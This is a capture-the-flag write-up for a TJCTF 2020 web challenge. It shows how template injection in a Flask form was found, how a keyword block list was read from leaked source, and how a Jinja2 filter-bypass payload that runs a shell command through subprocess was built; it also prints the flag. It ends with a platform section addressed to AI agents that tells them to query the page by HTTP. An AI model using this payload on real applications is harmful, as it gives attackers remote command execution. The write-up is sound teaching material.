# Congenial Octo Couscous

Try filling out the form once -- it returns some of our own input. Sign of XSS or SSTI.\
`<b>1</b>` doesn't do anything, but `{{config}}` does.

```
SERVER_FILEPATH&#39;: &#39;/secretserverfile.py&#39;}&gt;.
```

This line ^^^ in particular looks interesting. Visiting the link `/secretserverfile.py` reveals the source code for the challenge, which includes some code about filtration.

```javascript
if '{' in text or '}' in text:
        text2=re.sub(r'\s','',text).lower()
        illegal = ['"', 'class', '[', ']', 'dict', 'sys', 'os', 'eval', 'exec', 'config.']
```

So it seems like the challenge is to bypass the filter to read the strategy guide. Given flask is written in python, it would make sense to import a module that can execute commands; althought os is filtered, subprocess is not, and now the only challenge is figuring out how to import. After a fair bit of googling, it turns out

```
request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')
```

Can be used to import a module. Combining this with subprocess we get a final payload of:

```javascript
{{request|attr('application')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')('subprocess')|attr('getoutput')('cat strategyguide.txt')}}
```

and reading the file gives us: Best formation that wins every time:\
`DDDDD DLLLD DLHLD DLLLD DDDDD Key: D=Drone L=Landscaper H=HQ Beginning of game strategy`:

## tjctf{c0ng3n1al\_500iq\_str4ts\_ez\_dub}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-winrars.gitbook.io/writeups/2020-writeups/tjctf/congenial-octo-couscous.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.